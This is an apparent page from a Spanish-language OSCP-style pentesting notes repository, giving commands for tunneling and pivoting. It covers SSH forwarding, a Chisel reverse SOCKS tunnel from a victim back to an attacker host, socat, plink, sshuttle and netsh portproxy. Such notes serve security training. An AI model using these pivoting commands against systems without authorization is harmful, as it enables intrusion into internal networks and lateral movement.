El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
45 lines
1.4 KiB
Markdown
45 lines
1.4 KiB
Markdown
# Tunneling y port forwarding
|
|
|
|
> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.
|
|
|
|
## SSH (el más portable)
|
|
```bash
|
|
ssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 → servicio interno
|
|
ssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390
|
|
ssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080
|
|
# luego: proxychains <herramienta> (configura socks en /etc/proxychains4.conf)
|
|
```
|
|
|
|
## Chisel (cuando no hay SSH)
|
|
```bash
|
|
# Kali (servidor):
|
|
./chisel server -p 8000 --reverse
|
|
# Víctima (cliente) → SOCKS reverso:
|
|
./chisel client TU_IP:8000 R:socks
|
|
# ahora: proxychains nmap -sT -Pn 192.168.5.10
|
|
```
|
|
|
|
## socat (redirección simple)
|
|
```bash
|
|
socat TCP-LISTEN:8080,fork TCP:192.168.5.10:80
|
|
```
|
|
|
|
## Plink (SSH desde Windows)
|
|
```cmd
|
|
plink.exe -R 3390:127.0.0.1:3389 user@TU_IP
|
|
```
|
|
|
|
## sshuttle (VPN improvisada, lo más cómodo)
|
|
```bash
|
|
sshuttle -r user@pivot 192.168.5.0/24 --dns
|
|
```
|
|
|
|
## Windows nativo — netsh portproxy
|
|
```cmd
|
|
netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80
|
|
```
|
|
|
|
## proxychains
|
|
- `proxychains nmap -sT -Pn IP` → usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.
|
|
|
|
Relacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC
|